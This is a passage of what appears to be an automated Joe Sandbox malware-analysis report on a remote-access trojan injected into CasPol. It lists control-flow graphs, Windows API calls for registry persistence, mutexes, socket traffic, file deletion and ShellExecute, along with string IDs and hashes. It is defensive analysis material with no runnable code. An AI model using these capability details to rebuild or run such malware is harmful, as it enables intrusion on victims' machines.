                                                                                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                                      • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3658366068-0
                                                                                                                      • Opcode ID: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
                                                                                                                      • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                                                                                                                      • Opcode Fuzzy Hash: 7b4c4e1fc9e1a33e746d3ea038c7d733e0ecce283ed42e9dfa2e2b523637497c
                                                                                                                      • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1016 40c89e-40c8c3 call 401e52 1019 40c8c9 1016->1019 1020 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1016->1020 1022 40c8d0-40c8d5 1019->1022 1023 40c9c2-40c9c7 1019->1023 1024 40c905-40c90a 1019->1024 1025 40c9d8 1019->1025 1026 40c9c9-40c9ce call 43ac1f 1019->1026 1027 40c8da-40c8e8 call 41a75b call 401e18 1019->1027 1028 40c8fb-40c900 1019->1028 1029 40c9bb-40c9c0 1019->1029 1030 40c90f-40c916 call 41b16b 1019->1030 1043 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1020->1043 1032 40c9dd-40c9e2 call 43ac1f 1022->1032 1023->1032 1024->1032 1025->1032 1038 40c9d3-40c9d6 1026->1038 1047 40c8ed 1027->1047 1028->1032 1029->1032 1044 40c918-40c968 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1030->1044 1045 40c96a-40c9b6 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1030->1045 1046 40c9e3-40c9e8 call 4082d7 1032->1046 1038->1025 1038->1046 1052 40c8f1-40c8f6 call 401e13 1044->1052 1045->1047 1046->1020 1047->1052 1052->1020
                                                                                                                      APIs
                                                                                                                      • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LongNamePath
                                                                                                                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                      • API String ID: 82841172-425784914
                                                                                                                      • Opcode ID: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
                                                                                                                      • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                                                                                                                      • Opcode Fuzzy Hash: e65b7fd2f28b979a12418c5f5c2e2d29b720dc4ff9d72dd2f9df27909d96306d
                                                                                                                      • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                        • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                        • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                        • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                                                      • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                                      • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                      • API String ID: 1866151309-3211212173
                                                                                                                      • Opcode ID: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
                                                                                                                      • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                                                                                                                      • Opcode Fuzzy Hash: 9cf1f296616cdcd313259411c277503da338ecbad0565973079cd90fb6de65e1
                                                                                                                      • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1169 4126d2-4126e9 RegCreateKeyA 1170 412722 1169->1170 1171 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1169->1171 1173 412724-412730 call 401eea 1170->1173 1171->1173
                                                                                                                      APIs
                                                                                                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                                      • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateValue
                                                                                                                      • String ID: HgF$pth_unenc
                                                                                                                      • API String ID: 1818849710-3662775637
                                                                                                                      • Opcode ID: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
                                                                                                                      • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                                      • Opcode Fuzzy Hash: 5060bd4906adf847476d1d6d5221a1eec7a3f5928a954e173dbc633271fad0d2
                                                                                                                      • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1196 4127d5-4127eb RegCreateKeyA 1197 412818-41281b 1196->1197 1198 4127ed-412812 RegSetValueExA RegCloseKey 1196->1198 1198->1197 1199 412814-412817 1198->1199
                                                                                                                      APIs
                                                                                                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                      • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateValue
                                                                                                                      • String ID: TUF
                                                                                                                      • API String ID: 1818849710-3431404234
                                                                                                                      • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                      • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                      • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                      • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1200 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                                                                                      APIs
                                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                      • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateErrorLastMutex
                                                                                                                      • String ID: (CG
                                                                                                                      • API String ID: 1925916568-4210230975
                                                                                                                      • Opcode ID: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
                                                                                                                      • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                                      • Opcode Fuzzy Hash: 68001a27d0a1b5aca9f7806f756c118c8604acbb3141160e9eafa025ff823f9e
                                                                                                                      • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1203 412513-41253f RegOpenKeyExA 1204 412541-412567 RegQueryValueExA RegCloseKey 1203->1204 1205 412572 1203->1205 1204->1205 1206 412569-412570 1204->1206 1207 412577-412583 call 401f66 1205->1207 1206->1207
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3677997916-0
                                                                                                                      • Opcode ID: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                                                                                                                      • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                                      • Opcode Fuzzy Hash: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                                                                                                                      • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1210 4124b7-4124df RegOpenKeyExA 1211 4124e1-412509 RegQueryValueExA RegCloseKey 1210->1211 1212 41250f-412512 1210->1212 1211->1212 1213 41250b-41250e 1211->1213
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3677997916-0
                                                                                                                      • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                      • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                      • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                      • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1214 41246e-41248d RegOpenKeyExA 1215 4124b2 1214->1215 1216 41248f-4124ac RegQueryValueExA RegCloseKey 1214->1216 1217 4124b4-4124b6 1215->1217 1216->1215 1218 4124ae-4124b0 1216->1218 1218->1217
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3677997916-0
                                                                                                                      • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                      • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                                      • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                      • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen
                                                                                                                      • String ID: xAG
                                                                                                                      • API String ID: 176396367-2759412365
                                                                                                                      • Opcode ID: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                                                                                                                      • Instruction ID: 06a27fc39790a6443aa461e0e984232ee7603be4cd8470566e0b89af9a4a2a71
                                                                                                                      • Opcode Fuzzy Hash: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                                                                                                                      • Instruction Fuzzy Hash: FE1163329002059FCB15FF66D8969EF77A4EF64314B10453FF842622E2EF38A955CB98
                                                                                                                      APIs
                                                                                                                      • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                        • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateEventStartupsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1953588214-0
                                                                                                                      • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                      • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                                      • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                      • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                                      APIs
                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7
                                                                                                                        • Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,00434421,?,?,?,?,?,?,?,?,00434421,?,0046D644,00404AD0), ref: 00437C47
                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3476068407-0
                                                                                                                      • Opcode ID: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                                                                                                                      • Instruction ID: a120e58b429b9861eb3006866c51ef53ea309f8249189fce9472b36b7df41f91
                                                                                                                      • Opcode Fuzzy Hash: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                                                                                                                      • Instruction Fuzzy Hash: EFF0243080430D7BCB14BEAAE80799D772C5D08319F60612BB825955E1EF7CE715C58E
                                                                                                                      APIs
                                                                                                                      • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                                      • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                                        • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                        • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                        • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                        • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                        • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                        • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                        • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                        • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1170566393-0
                                                                                                                      • Opcode ID: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
                                                                                                                      • Instruction ID: 6b8e1b3bf706901e9cebb32ced8ad4f2671330a9e567d97b4cc2d1cd49d6d23a
                                                                                                                      • Opcode Fuzzy Hash: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
                                                                                                                      • Instruction Fuzzy Hash: CED05B326406216FA310575D6D01FFBB5DCDFA67717110077F408D7110D6946D8283ED
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                                      • Instruction ID: 9aef8a7b80d5ef8cde78cc1a95e43686bba12cbd10c6cd592e8946dff14ce016
                                                                                                                      • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                                      • Instruction Fuzzy Hash: 54E0E5312012B5A7FB202A6A9C05F5B7688DB437A4F060033AC45D66D0CB58EC4181AF
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Startup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 724789610-0
                                                                                                                      • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                      • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                                      • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                      • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: recv
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1507349165-0
                                                                                                                      • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                      • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                      • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                      • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: send
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2809346765-0
                                                                                                                      • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                      • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                                      • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                      • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                                      APIs
                                                                                                                      • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                                      • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                                      • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                        • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                                                                                                        • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                                                                                                        • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                                                                                                        • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                                                                                                        • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                                                                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                        • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                        • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                        • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                        • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                        • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                                                                                                                        • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                                      • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                        • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                        • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                        • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                                      • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                                        • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
